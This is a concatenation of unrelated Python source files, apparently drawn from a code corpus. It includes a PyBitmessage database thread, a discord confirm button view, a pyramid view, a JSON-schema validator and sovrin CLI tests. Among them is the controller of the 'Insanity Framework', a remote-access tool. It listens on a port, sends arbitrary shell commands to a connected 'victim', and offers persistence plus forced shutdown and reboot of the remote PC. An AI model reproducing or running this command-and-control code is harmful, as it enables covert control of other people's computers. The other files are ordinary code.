# single UPDATE statement (instead of a per-row loop) derives each address from its hash via the enaddr() function registered in create_function()
self.cur.execute('''UPDATE pubkeys SET address=(enaddr(pubkeys.addressversion, 1, hash)); ''')
# Now we can remove the hash field from the pubkeys table.
self.cur.execute(
'''CREATE TEMPORARY TABLE pubkeys_backup'''
''' (address text, addressversion int, transmitdata blob, time int,'''
''' usedpersonally text, UNIQUE(address) ON CONFLICT REPLACE)''')
self.cur.execute(
'''INSERT INTO pubkeys_backup'''
''' SELECT address, addressversion, transmitdata, time, usedpersonally FROM pubkeys;''')
self.cur.execute('''DROP TABLE pubkeys''')
self.cur.execute(
'''CREATE TABLE pubkeys'''
''' (address text, addressversion int, transmitdata blob, time int, usedpersonally text,'''
''' UNIQUE(address) ON CONFLICT REPLACE)''')
self.cur.execute(
'''INSERT INTO pubkeys SELECT'''
''' address, addressversion, transmitdata, time, usedpersonally FROM pubkeys_backup;''')
self.cur.execute('''DROP TABLE pubkeys_backup''')
logger.debug(
'In messages.dat database, done adding address field to the pubkeys table'
' and removing the hash field.')
self.cur.execute('''update settings set value=10 WHERE key='version';''')
# Update the address column to UNIQUE in the addressbook table
item = '''SELECT value FROM settings WHERE key='version';'''
parameters = ''
self.cur.execute(item, parameters)
currentVersion = int(self.cur.fetchall()[0][0])
if currentVersion == 10:
logger.debug(
'In messages.dat database, updating address column to UNIQUE'
' in the addressbook table.')
self.cur.execute(
'''ALTER TABLE addressbook RENAME TO old_addressbook''')
self.cur.execute(
'''CREATE TABLE addressbook'''
''' (label text, address text, UNIQUE(address) ON CONFLICT IGNORE)''')
self.cur.execute(
'''INSERT INTO addressbook SELECT label, address FROM old_addressbook;''')
self.cur.execute('''DROP TABLE old_addressbook''')
self.cur.execute('''update settings set value=11 WHERE key='version';''')
# Are you hoping to add a new option to the keys.dat file of existing
# Bitmessage users or modify the SQLite database? Add it right
# above this line!
try:
testpayload = '\x00\x00'
t = ('1234', 1, testpayload, '12345678', 'no')
self.cur.execute('''INSERT INTO pubkeys VALUES(?,?,?,?,?)''', t)
self.conn.commit()
self.cur.execute(
'''SELECT transmitdata FROM pubkeys WHERE address='1234' ''')
queryreturn = self.cur.fetchall()
for row in queryreturn:
transmitdata, = row
self.cur.execute('''DELETE FROM pubkeys WHERE address='1234' ''')
self.conn.commit()
if transmitdata == '':
logger.fatal(
'Problem: The version of SQLite you have cannot store Null values.'
' Please download and install the latest revision of your version of Python'
' (for example, the latest Python 2.7 revision) and try again.\n')
logger.fatal(
'PyBitmessage will now exit very abruptly.'
' You may now see threading errors related to this abrupt exit'
' but the problem you need to solve is related to SQLite.\n\n')
os._exit(0)
except Exception as err:
if str(err) == 'database or disk is full':
logger.fatal(
'(While null value test) Alert: Your disk or data storage volume is full.'
' sqlThread will now exit.')
queues.UISignalQueue.put((
'alert', (
_translate(
"MainWindow",
"Disk full"),
_translate(
"MainWindow",
'Alert: Your disk or data storage volume is full. Bitmessage will now exit.'),
True)))
os._exit(0)
else:
logger.error(err)
# Let us check to see the last time we vacuumed the messages.dat file.
# If it has been more than a day (86400 seconds) since then, do it now.
item = '''SELECT value FROM settings WHERE key='lastvacuumtime';'''
parameters = ''
self.cur.execute(item, parameters)
queryreturn = self.cur.fetchall()
for row in queryreturn:
value, = row
if int(value) < int(time.time()) - 86400:
logger.info('It has been a long time since the messages.dat file has been vacuumed. Vacuuming now...')
try:
self.cur.execute(''' VACUUM ''')
except Exception as err:
if str(err) == 'database or disk is full':
logger.fatal(
'(While VACUUM) Alert: Your disk or data storage volume is full.'
' sqlThread will now exit.')
queues.UISignalQueue.put((
'alert', (
_translate(
"MainWindow",
"Disk full"),
_translate(
"MainWindow",
'Alert: Your disk or data storage volume is full. Bitmessage will now exit.'),
True)))
os._exit(0)
item = '''update settings set value=? WHERE key='lastvacuumtime';'''
parameters = (int(time.time()),)
self.cur.execute(item, parameters)
helper_sql.sql_ready.set()
while True:
item = helper_sql.sqlSubmitQueue.get()
if item == 'commit':
try:
self.conn.commit()
except Exception as err:
if str(err) == 'database or disk is full':
logger.fatal(
'(While committing) Alert: Your disk or data storage volume is full.'
' sqlThread will now exit.')
queues.UISignalQueue.put((
'alert', (
_translate(
"MainWindow",
"Disk full"),
_translate(
"MainWindow",
'Alert: Your disk or data storage volume is full. Bitmessage will now exit.'),
True)))
os._exit(0)
elif item == 'exit':
self.conn.close()
logger.info('sqlThread exiting gracefully.')
return
elif item == 'movemessagstoprog':
logger.debug('the sqlThread is moving the messages.dat file to the local program directory.')
try:
self.conn.commit()
except Exception as err:
if str(err) == 'database or disk is full':
logger.fatal(
'(while movemessagstoprog) Alert: Your disk or data storage volume is full.'
' sqlThread will now exit.')
queues.UISignalQueue.put((
'alert', (
_translate(
"MainWindow",
"Disk full"),
_translate(
"MainWindow",
'Alert: Your disk or data storage volume is full. Bitmessage will now exit.'),
True)))
os._exit(0)
self.conn.close()
shutil.move(
paths.lookupAppdataFolder() + 'messages.dat', paths.lookupExeFolder() + 'messages.dat')
self.conn = sqlite3.connect(paths.lookupExeFolder() + 'messages.dat')
self.conn.text_factory = str
self.cur = self.conn.cursor()
elif item == 'movemessagstoappdata':
logger.debug('the sqlThread is moving the messages.dat file to the Appdata folder.')
try:
self.conn.commit()
except Exception as err:
if str(err) == 'database or disk is full':
logger.fatal(
'(while movemessagstoappdata) Alert: Your disk or data storage volume is full.'
' sqlThread will now exit.')
queues.UISignalQueue.put((
'alert', (
_translate(
"MainWindow",
"Disk full"),
_translate(
"MainWindow",
'Alert: Your disk or data storage volume is full. Bitmessage will now exit.'),
True)))
os._exit(0)
self.conn.close()
shutil.move(
paths.lookupExeFolder() + 'messages.dat', paths.lookupAppdataFolder() + 'messages.dat')
self.conn = sqlite3.connect(paths.lookupAppdataFolder() + 'messages.dat')
self.conn.text_factory = str
self.cur = self.conn.cursor()
elif item == 'deleteandvacuume':
self.cur.execute('''delete from inbox where folder='trash' ''')
self.cur.execute('''delete from sent where folder='trash' ''')
self.conn.commit()
try:
self.cur.execute(''' VACUUM ''')
except Exception as err:
if str(err) == 'database or disk is full':
logger.fatal(
'(while deleteandvacuume) Alert: Your disk or data storage volume is full.'
' sqlThread will now exit.')
queues.UISignalQueue.put((
'alert', (
_translate(
"MainWindow",
"Disk full"),
_translate(
"MainWindow",
'Alert: Your disk or data storage volume is full. Bitmessage will now exit.'),
True)))
os._exit(0)
else:
parameters = helper_sql.sqlSubmitQueue.get()
rowcount = 0
try:
self.cur.execute(item, parameters)
rowcount = self.cur.rowcount
except Exception as err:
if str(err) == 'database or disk is full':
logger.fatal(
'(while cur.execute) Alert: Your disk or data storage volume is full.'
' sqlThread will now exit.')
queues.UISignalQueue.put((
'alert', (
_translate(
"MainWindow",
"Disk full"),
_translate(
"MainWindow",
'Alert: Your disk or data storage volume is full. Bitmessage will now exit.'),
True)))
os._exit(0)
else:
logger.fatal(
'Major error occurred when trying to execute a SQL statement within the sqlThread.'
' Please tell Atheros about this error message or post it in the forum!'
' Error occurred while trying to execute statement: "%s" Here are the parameters;'
' you might want to censor this data with asterisks (***)'
' as it can contain private information: %s.'
' Here is the actual error message thrown by the sqlThread: %s',
str(item),
str(repr(parameters)),
str(err))
logger.fatal('This program shall now abruptly exit!')
os._exit(0)
helper_sql.sqlReturnQueue.put((self.cur.fetchall(), rowcount))
# helper_sql.sqlSubmitQueue.task_done()
def create_function(self):
# Register the enaddr() SQL function so the UPDATE above can derive an address from (addressversion, stream, hash)
try:
self.conn.create_function("enaddr", 3, func=encodeAddress, deterministic=True)
except (TypeError, sqlite3.NotSupportedError) as err:
logger.debug(
"Got error while pass deterministic in sqlite create function {}, Passing 3 params".format(err))
self.conn.create_function("enaddr", 3, encodeAddress)
|
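The main loop of `run()` above defines the wire format callers must follow: the SQL string goes onto `sqlSubmitQueue`, the parameters tuple follows as a second item (unless the string is one of the special commands such as `'commit'` or `'exit'`), and the result comes back on `sqlReturnQueue` as `(fetchall(), rowcount)`. A sketch of a caller, assuming the thread is already running, that `sql_ready` is a `threading.Event` (as the `.set()` call above suggests), and with the locking done by the real `helper_sql` wrappers omitted:

```python
import helper_sql

helper_sql.sql_ready.wait()     # set by run() once table creation and migrations finish

# Submit a parameterised query: statement first, parameters as a second queue item.
helper_sql.sqlSubmitQueue.put('''SELECT toaddress, subject FROM inbox WHERE folder=?''')
helper_sql.sqlSubmitQueue.put(('inbox',))
rows, rowcount = helper_sql.sqlReturnQueue.get()   # (cur.fetchall(), cur.rowcount)

helper_sql.sqlSubmitQueue.put('commit')            # one of the special string commands
```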
py | 7df9e2953076f7126207c9d2310cd002836598be | from typing import Any, Optional
from discord import ui
from discord.ext import commands
import discord
class ConfirmView(ui.View):
def __init__(
self,
context: commands.Context,
/,
*,
responded=None,
delete_after=True,
**kwargs: Any,
):
super().__init__(**kwargs)
self.ctx = context
self._result = None
self.message = None
self.delete_after = delete_after
self.responded = responded or context.author
async def prompt(self, *args: str, **kwargs: Any) -> Optional[bool]:
self.message = await self.ctx.send(*args, view=self, **kwargs)
await self.wait()
return self.result
async def interaction_check(self, interaction: discord.Interaction) -> bool:
if self.responded.id != getattr(interaction.user, "id", None):
await interaction.response.send_message(
f"Only {self.responded} can respond to this message!", ephemeral=True
)
return False
return True
async def stopping(self):
if self.delete_after:
await self.message.delete(delay=0)
else:
for item in self.children:
item.disabled = True
await self.message.edit(view=self)
def stop(self):
super().stop()
self.ctx.bot.loop.create_task(self.stopping())
@property
def result(self):
return self._result
@result.setter
def result(self, value):
self._result = value
self.stop()
@ui.button(label="Accept", style=discord.ButtonStyle.green)
async def accept(self, button: ui.Button, interaction: discord.Interaction):
self.result = True
@ui.button(label="Deny", style=discord.ButtonStyle.red)
async def deny(self, button: ui.Button, interaction: discord.Interaction):
self.result = False
|
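In use, the view is created per invocation, `prompt()` sends the message and blocks on `wait()`, and the button callbacks resolve it through the `result` setter (which also stops the view and triggers cleanup). A sketch of a command using it, assuming the same discord library version as the file above; the command itself is hypothetical and still needs to be registered with `bot.add_command(...)`:

```python
from discord.ext import commands

@commands.command()
async def reset(ctx: commands.Context):
    view = ConfirmView(ctx, timeout=60)            # timeout is forwarded to ui.View
    confirmed = await view.prompt("Really reset your profile?")
    if confirmed:
        await ctx.send("Profile reset.")
    elif confirmed is False:
        await ctx.send("Cancelled.")
    else:                                          # None: the view timed out
        await ctx.send("No response, aborting.")
```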
py | 7df9e34b08fabde5274c3194bcac4f2182c34544 | # coding: utf-8
#
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License'). You may not use this file
# except in compliance with the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the 'license' file accompanying this file. This file is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for
# the specific language governing permissions and limitations under the License.
#
from __future__ import absolute_import
from .endpoint import Endpoint
from .header import Header
from .filter_match_action import FilterMatchAction
from .events_received_request import EventsReceivedRequest
from .expired_request import ExpiredRequest
from .start_event_handler_directive import StartEventHandlerDirective
from .stop_event_handler_directive import StopEventHandlerDirective
from .send_directive_directive import SendDirectiveDirective
from .expiration import Expiration
from .event import Event
from .event_filter import EventFilter
|
py | 7df9e4a35a9912a0ff849a79ca22a78e6ce2804e | from pyramid.response import Response
import os
HERE = os.path.dirname(__file__)
def my_view(request):
imported_text = open(os.path.join(HERE, 'sample.html')).read()
return Response(imported_text)
def includeme(config):
config.add_view(my_view, route_name='home')
|
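The `includeme()` hook above lets an application pull this view in with `config.include()`; the `home` route it binds to still has to be defined by the caller. A hypothetical wiring (the dotted package name is a guess):

```python
from wsgiref.simple_server import make_server
from pyramid.config import Configurator

with Configurator() as config:
    config.add_route('home', '/')
    config.include('mypackage.views')   # the module shown above; name is illustrative
    app = config.make_wsgi_app()

make_server('0.0.0.0', 6543, app).serve_forever()
```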
py | 7df9e4b95c74dd8392d835fae7fb1afc503a4e06 | from PyHive.Attribute import *
|
py | 7df9e4d37df8be078c5b92f21b14d4738d5f8702 | import json
import jsonschema
from jsonschema import validate as jvalidate
from jsonschema import Draft4Validator
from collections import OrderedDict
from os.path import isdir, isfile, join
def get_file_as_dict(fname):
"""Open the file and load as a dict"""
fpath = join('input', fname)
assert isfile(fpath), 'file not found: %s' % fpath
print('load file: %s' % fpath)
info_dict = json.loads(open(fpath, 'r').read())  # optionally: object_pairs_hook=OrderedDict
#if 'xvariables' in info_dict:
# return info_dict['variables']
return info_dict
def run_it(schema_fname, data_fname):
# (1) VALIDATE THE SCHEMA
#
the_schema = get_file_as_dict(schema_fname)
#print(json.dumps(the_schema, indent=4))
try:
Draft4Validator.check_schema(the_schema)
except jsonschema.exceptions.SchemaError as err_obj:
print('Schema Error. short message: ', err_obj.message)
print('Schema Error. full message: ', err_obj)
return
# (2) VALIDATE THE DATA USING THE SCHEMA
#
the_data = get_file_as_dict(data_fname)
#print(json.dumps(the_data, indent=4))
try:
Draft4Validator(the_schema).validate(the_data)
except jsonschema.exceptions.ValidationError as err_obj:
print('Data Error. short message: ', err_obj.message)
print('Data Error. full message: ', err_obj)
return
print('looking good!')
if __name__ == '__main__':
#run_it('dataset_schema.json', 'dataset_data_02.json')
#run_it('variable_schema.json', 'variable_data_01.json')
#run_it('variable_schema_05.json', 'variable_data_04.json')
run_it('variable_schema_11.json', 'test_data.json')
|
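Two distinct checks are involved above: `Draft4Validator.check_schema()` verifies the schema itself against the Draft 4 meta-schema (raising `SchemaError`), while `Draft4Validator(schema).validate(data)` checks a document against that schema (raising `ValidationError`). A standalone illustration with an inline schema:

```python
import jsonschema
from jsonschema import Draft4Validator

schema = {"type": "object",
          "required": ["name"],
          "properties": {"name": {"type": "string"}}}

Draft4Validator.check_schema(schema)              # raises SchemaError if the schema is malformed
try:
    Draft4Validator(schema).validate({"name": 1})  # data check
except jsonschema.exceptions.ValidationError as err:
    print(err.message)                             # 1 is not of type 'string'
```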
py | 7df9e4df6f967f13136a64320179eef6e6a0fc02 | #!/usr/bin/python
from collections import defaultdict
import os, sys, re, subprocess, tempfile, json, pickle, random, time
if __name__ == '__main__':
types_filename = sys.argv[1]
with open(types_filename, 'r') as f:
types = [t.strip() for t in f.read().splitlines()]
cnt = 0
for i, val in enumerate(types):
index = 0
for j, char in enumerate(val):
if (char == '<') and (val[j+1] == '-'):
index = val[j-2]
cmd = 'Feature{}(?heap{}),'.format(cnt,index)
cnt = cnt+1
print(cmd + val)
|
py | 7df9e5f004fe026ef72b8c9e30d1643d30f652ef | #!/usr/bin/python
# -*- coding: iso-8859-15 -*-
# Copyright 2017 Insanity Framework (IF)
# Written by: * Alisson Moretto - 4w4k3
# https://github.com/4w4k3/Insanity-Framework
# Licensed under the BSD-3-Clause
from socket import *
import os
import sys
from bin.settings import exec_com
from bin.settings import BLUE, RED, WHITE, GREEN, END
if not os.geteuid() == 0:
sys.exit('Insanity must be run as root')
HOST = ''
PORT = int(raw_input('Tʏᴘᴇ ᴛʜᴇ ᴘᴏʀᴛ: '))
def clear():
os.system('clear')
def heading():
sys.stdout.write(RED + '''
.o oOOOOOOOo OOOo
Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO
OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO
OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB'
`O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo
.OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO
OOOOO '"OOOOOOOOOOOOOOOO"` oOO
oOOOOOba. .adOOOOOOOOOOba .adOOOOo.
oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO
OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
"OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO"
Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`
: .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .
. oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
'%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
`$" `OOOO' `O"Y ' `OOOO' o .
. . OP" : o .
: ʙʏ: ''' + WHITE + '''Alisson Moretto(''' + RED + '''4ᴡ4ᴋ3''' + WHITE + ''')''' + RED + '''
-- [I]nsanity [F]ramework -- Version: 0.1
''' + END)
def pp():
sys.stdout.write(RED + '''
$u #$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$~
$# `"$$$$$$$$$$$$$$$$$$$$$$$$$$| [PROPANE |$$$$$$$
$i $$$$$$$$$$$$$$$$$$$$$$$$$$| [NIGHTMARE |$$$$$$$$
$$ #$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
#$. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#
$$ $iW$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$!
$$i $$$$$$$#"" `"""#$$$$$$$$$$$$$$$$$#""""""#$$$$$$$$$$$$$$$W
#$$W `$$$#" " !$$$$$` `"#$$$$$$$$$$#
$$$ `` ! !iuW$$$$$ #$$$$$$$#
#$$ $u $ $$$$$$$ $$$$$$$~
"# #$$i. # $$$$$$$. `$$$$$$
$$$$$i. """#$$$$i. .$$$$#
$$$$$$$$! . ` $$$$$$$$$i $$$$$
`$$$$$ $iWW .uW` #$$$$$$$$$W. .$$$$$$#
"#$$$$$$$$$$$$#` $$$$$$$$$$$iWiuuuW$$$$$$$$W
!#"" "" `$$$$$$$##$$$$$$$$$$$$$$$$
i$$$$ . !$$$$$$ .$$$$$$$$$$$$$$$#
$$$$$$$$$$` $$$$$$$$$Wi$$$$$$#"#$$`
#$$$$$$$$$W. $$$$$$$$$$$# ``
`$$$$##$$$$! i$u. $. .i$$$$$$$$$#""''' + WHITE + ''' InSaNiTy FrAmEwOrK''' + RED + '''
" `#W $$$$$$$$$$$$$$$$$$$` u$#
W$$$$$$$$$$$$$$$$$$ $$$$W
$$`!$$$##$$$$``$$$$ $$$$!
i$" $$$$ $$#"` """ W$$$$
''' + END)
clear()
heading()
def mess():
print '[*] O.S.: ' + data2
if vm == 'True':
print '[*] Virtual Machine: {0}Detected{1}'.format(RED, END)
else:
print '[*] Virtual Machine: Not Detected'
print '-{0} Type a remote shell command{1} - {0}[{1}ex: ipconfig{0}]{1}: '.format(BLUE, END)
print '- {0}Run insanity modules{1} - {0}[{1}view available modules on help message{0}]{1}: '.format(BLUE, END)
print '-{0} ʜᴇʟᴘ {1}- {0}[{1}View help message and modules{0}]{1}: '.format(BLUE, END)
s = socket(AF_INET, SOCK_STREAM)
print '[!] Waiting Connections '
s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
s.bind((HOST, PORT))
print "[*] Listening on: 0.0.0.0:%s" % str(PORT)
s.listen(10)
conn, addr = s.accept()
print '[*] Connection: ' + '{0}ESTABLISHED{2}'.format(GREEN, WHITE, END)
data = conn.recv(1024)
ip = conn.recv(1024)
conn.send('whoami')
data2 = conn.recv(1024)
vm = conn.recv(1024)
#oss = conn.recv(1024)
mess()
def help():
print '''
- [I]nsanity [F]ramework -
ᴛʏᴘᴇ {0}info{1} - {0}[{1}show info about victim{0}]{1}
ᴛʏᴘᴇ {0}persistence{1} - {0}[{1}enable persistence{0}]{1}
ᴛʏᴘᴇ {0}shutdown{1} - {0}[{1}turn off remote pc{0}]{1}
ᴛʏᴘᴇ {0}restart{1} - {0}[{1}reboot remote pc{0}]{1}
ᴛʏᴘᴇ {0}back{1} - {0}[{1}return to main menu{0}]{1}
ᴛʏᴘᴇ {0}quit{1} - {0}[{1}tool exit{0}]{1}
'''.format(BLUE, END)
# start loop
def main():
try:
while 1:
# enter shell command
header = ('{0}InSaNiTy{1} > {2}'.format(RED, WHITE, END))
command = raw_input(header)
if command.upper() == 'QUIT':
clear()
pp()
conn.close()
elif command.upper() == 'HELP':
help()
elif command.upper() == 'INFO':
mess()
elif command.upper() == 'BACK':
exec_com('insanity.py')
elif command.upper() == 'PERSISTENCE':
try:
conn.send('persistence')
print '[*] Persistence module enabled'
except:
print '\n'
print '{0}Remote host are disconnected{1} '.format(RED, END)
print '\n' + 'ᴛʏᴘᴇ {0}ʙᴀᴄᴋ{1} - {0}[{1}ʀᴇᴛᴜʀɴ ᴛᴏ ᴍᴀɪɴ ᴍᴇɴᴜ{0}]{1}'.format(BLUE, END)
print 'ᴛʏᴘᴇ {0}ǫᴜɪᴛ{1} - {0}[{1}ᴛᴏᴏʟ ᴇxɪᴛ{0}]{1}'.format(BLUE, END)
elif command.upper() == 'SHUTDOWN':
try:
conn.send('shutdown -s -t 00 -f')
except:
print '\n'
print '{0}ʀᴇᴍᴏᴛᴇ ʜᴏsᴛ ʜᴀs ʙᴇᴇɴ ᴅɪsᴄᴏɴɴᴇᴄᴛᴇᴅ{1} '.format(RED, END)
print '\n' + 'ᴛʏᴘᴇ {0}ʙᴀᴄᴋ{1} - {0}[{1}ʀᴇᴛᴜʀɴ ᴛᴏ ᴍᴀɪɴ ᴍᴇɴᴜ{0}]{1}'.format(BLUE, END)
print 'ᴛʏᴘᴇ {0}ǫᴜɪᴛ{1} - {0}[{1}ᴛᴏᴏʟ ᴇxɪᴛ{0}]{1}'.format(BLUE, END)
elif command.upper() == 'RESTART':
try:
conn.send('shutdown -r -t 00 -f')
except:
print '\n'
print '{0}ʀᴇᴍᴏᴛᴇ ʜᴏsᴛ ʜᴀs ʙᴇᴇɴ ᴅɪsᴄᴏɴɴᴇᴄᴛᴇᴅ{1} '.format(RED, END)
print '\n' + 'ᴛʏᴘᴇ {0}ʙᴀᴄᴋ{1} - {0}[{1}ʀᴇᴛᴜʀɴ ᴛᴏ ᴍᴀɪɴ ᴍᴇɴᴜ{0}]{1}'.format(BLUE, END)
print 'ᴛʏᴘᴇ {0}ǫᴜɪᴛ{1} - {0}[{1}ᴛᴏᴏʟ ᴇxɪᴛ{0}]{1}'.format(BLUE, END)
else:
try:
if command != '':
data = ''
conn.send(command)
try:
s.settimeout(5.0)
conn.settimeout(5.0)
data = conn.recv(4096)
print data
s.settimeout(None)
conn.settimeout(None)
except:
print '[*] ᴄᴏᴍᴍᴀɴᴅ ᴇxᴇᴄᴜᴛᴇᴅ'
except:
print '\n'
print '{0}ʀᴇᴍᴏᴛᴇ ʜᴏsᴛ ʜᴀs ʙᴇᴇɴ ᴅɪsᴄᴏɴɴᴇᴄᴛᴇᴅ{1} '.format(RED, END)
print '\n' + 'ᴛʏᴘᴇ {0}ʙᴀᴄᴋ{1} - {0}[{1}ʀᴇᴛᴜʀɴ ᴛᴏ ᴍᴀɪɴ ᴍᴇɴᴜ{0}]{1}'.format(BLUE, END)
print 'ᴛʏᴘᴇ {0}ǫᴜɪᴛ{1} - {0}[{1}ᴛᴏᴏʟ ᴇxɪᴛ{0}]{1}'.format(BLUE, END)
except KeyboardInterrupt:
clear()
pp()
conn.close()
if __name__ == '__main__':
main()
|
py | 7df9e64c3e018390aa2257078e19f59682d38954 | import pytest
from plenum.common.signer_did import DidSigner
from plenum.common.signer_simple import SimpleSigner
from sovrin_client.client.wallet.wallet import Wallet
from sovrin_client.test.cli.helper import prompt_is, addNym, ensureConnectedToTestEnv
from sovrin_common.roles import Roles
from sovrin_node.test.did.conftest import wallet, abbrevVerkey
TRUST_ANCHOR_SEED = b'TRUST0NO0ONE00000000000000000000'
@pytest.fixture("module")
def trust_anchor_did_signer():
return DidSigner(seed=TRUST_ANCHOR_SEED)
@pytest.fixture("module")
def trust_anchor_cid_signer():
return SimpleSigner(seed=TRUST_ANCHOR_SEED)
@pytest.fixture("module")
def trustAnchorWallet(trustAnchorSigner):
w = Wallet(trustAnchorSigner.identifier)
w.addIdentifier(signer=trustAnchorSigner)
return w
def testPoolNodesStarted(poolNodesStarted):
pass
@pytest.fixture(scope="module")
def aliceCli(be, do, poolNodesStarted, aliceCLI, connectedToTest, wallet):
be(aliceCLI)
do('prompt Alice', expect=prompt_is('Alice'))
addAndActivateCLIWallet(aliceCLI, wallet)
do('connect test', within=3, expect=connectedToTest)
return aliceCLI
@pytest.fixture(scope="module")
def trustAnchorCli(be, do, poolNodesStarted, earlCLI, connectedToTest,
trustAnchorWallet):
be(earlCLI)
do('prompt Earl', expect=prompt_is('Earl'))
addAndActivateCLIWallet(earlCLI, trustAnchorWallet)
do('connect test', within=3, expect=connectedToTest)
return earlCLI
def getNym(be, do, userCli, idr, expectedMsgs):
be(userCli)
do('send GET_NYM dest={}'.format(idr),
within=3,
expect=expectedMsgs
)
def getNymNotFoundExpectedMsgs(idr):
return ["NYM {} not found".format(idr)]
def testGetDIDWithoutAddingIt(be, do, philCli, trust_anchor_did_signer):
ensureConnectedToTestEnv(be, do, philCli)
getNym(be, do, philCli, trust_anchor_did_signer.identifier,
getNymNotFoundExpectedMsgs(trust_anchor_did_signer.identifier))
def testGetCIDWithoutAddingIt(be, do, philCli, trust_anchor_cid_signer):
ensureConnectedToTestEnv(be, do, philCli)
getNym(be, do, philCli, trust_anchor_cid_signer.identifier,
getNymNotFoundExpectedMsgs(trust_anchor_cid_signer.identifier))
def addAndActivateCLIWallet(cli, wallet):
cli.wallets[wallet.name] = wallet
cli.activeWallet = wallet
@pytest.fixture(scope="module")
def didAdded(be, do, philCli, trust_anchor_did_signer):
ensureConnectedToTestEnv(be, do, philCli)
addNym(be, do, philCli,
trust_anchor_did_signer.identifier,
role=Roles.TRUST_ANCHOR.name
)
return philCli
def testAddDID(didAdded):
pass
@pytest.fixture(scope="module")
def cidAdded(be, do, philCli, trust_anchor_cid_signer):
addNym(be, do, philCli, trust_anchor_cid_signer.identifier, role=Roles.TRUST_ANCHOR.name)
return philCli
def testAddCID(cidAdded):
pass
def getNoVerkeyEverAssignedMsgs(idr):
return ["No verkey ever assigned to the identifier {}".format(idr)]
def testGetDIDWithoutVerkey(be, do, philCli, didAdded, trust_anchor_did_signer):
getNym(be, do, philCli, trust_anchor_did_signer.identifier,
getNoVerkeyEverAssignedMsgs(trust_anchor_did_signer.identifier))
def getVerkeyIsSameAsIdentifierMsgs(idr):
return ["Current verkey is same as identifier {}".format(idr)]
def testGetCIDWithoutVerkey(be, do, philCli, cidAdded, trust_anchor_cid_signer):
getNym(be, do, philCli, trust_anchor_cid_signer.identifier,
getVerkeyIsSameAsIdentifierMsgs(trust_anchor_cid_signer.identifier))
@pytest.fixture(scope="module")
def verkeyAddedToDID(be, do, philCli, didAdded, trust_anchor_did_signer):
addNym(be, do, philCli, trust_anchor_did_signer.identifier,
trust_anchor_did_signer.verkey)
def testAddVerkeyToExistingDID(verkeyAddedToDID):
pass
@pytest.fixture(scope="module")
def verkeyAddedToCID(be, do, philCli, cidAdded, trust_anchor_cid_signer):
# newSigner = SimpleSigner(identifier=trust_anchor_cid_signer.identifier)
# new_verkey = newSigner.verkey
addNym(be, do, philCli, trust_anchor_cid_signer.identifier, verkey=trust_anchor_cid_signer.verkey)
return trust_anchor_cid_signer
def testAddVerkeyToExistingCID(verkeyAddedToCID):
pass
def getCurrentVerkeyIsgMsgs(idr, verkey):
return ["Current verkey for NYM {} is {}".format(idr, verkey)]
def testGetDIDWithVerKey(be, do, philCli, verkeyAddedToDID,
trust_anchor_did_signer):
getNym(be, do, philCli, trust_anchor_did_signer.identifier,
getCurrentVerkeyIsgMsgs(trust_anchor_did_signer.identifier,
trust_anchor_did_signer.verkey))
def testGetCIDWithVerKey(be, do, philCli, verkeyAddedToCID,
trust_anchor_cid_signer):
getNym(be, do, philCli, trust_anchor_cid_signer.identifier,
getCurrentVerkeyIsgMsgs(trust_anchor_cid_signer.identifier,
trust_anchor_cid_signer.verkey))
def getNoActiveVerkeyFoundMsgs(idr):
return ["No active verkey found for the identifier {}".format(idr)]
def addAttribToNym(be, do, userCli, idr, raw):
be(userCli)
do('send ATTRIB dest={} raw={}'.format(idr, raw),
within=5,
expect=["Attribute added for nym {}".format(idr)])
@pytest.mark.skip("INDY- This should not have worked")
def testSendAttribForDID(be, do, verkeyAddedToDID, trust_anchor_did_signer, aliceCli):
raw = '{"name": "Alice"}'
addAttribToNym(be, do, aliceCli, trust_anchor_did_signer.identifier, raw)
@pytest.mark.skip("INDY- This should not have worked")
def testSendAttribForCID(be, do, verkeyAddedToCID, trust_anchor_cid_signer, trustAnchorCli):
raw = '{"name": "Earl"}'
addAttribToNym(be, do, trustAnchorCli, trust_anchor_cid_signer.identifier, raw)
@pytest.fixture(scope="module")
def verkeyRemovedFromExistingDID(be, do, verkeyAddedToDID, abbrevIdr, aliceCli):
be(aliceCli)
addNym(be, do, aliceCli, abbrevIdr, '')
getNym(be, do, aliceCli, abbrevIdr, getNoActiveVerkeyFoundMsgs(abbrevIdr))
@pytest.mark.skip(reason="verkey removal is not supported")
def testRemoveVerkeyFromDID(verkeyRemovedFromExistingDID):
pass
@pytest.fixture(scope="module")
def verkeyRemovedFromExistingCID(be, do, verkeyAddedToCID,
trustAnchorSigner, trustAnchorCli, trustAnchorWallet):
be(trustAnchorCli)
addNym(be, do, trustAnchorCli, trustAnchorSigner.identifier, '')
getNym(be, do, trustAnchorCli, trustAnchorSigner.identifier,
getNoActiveVerkeyFoundMsgs(trustAnchorSigner.identifier))
@pytest.mark.skip(reason="verkey removal is not supported")
def testRemoveVerkeyFromCID(verkeyRemovedFromExistingCID):
pass
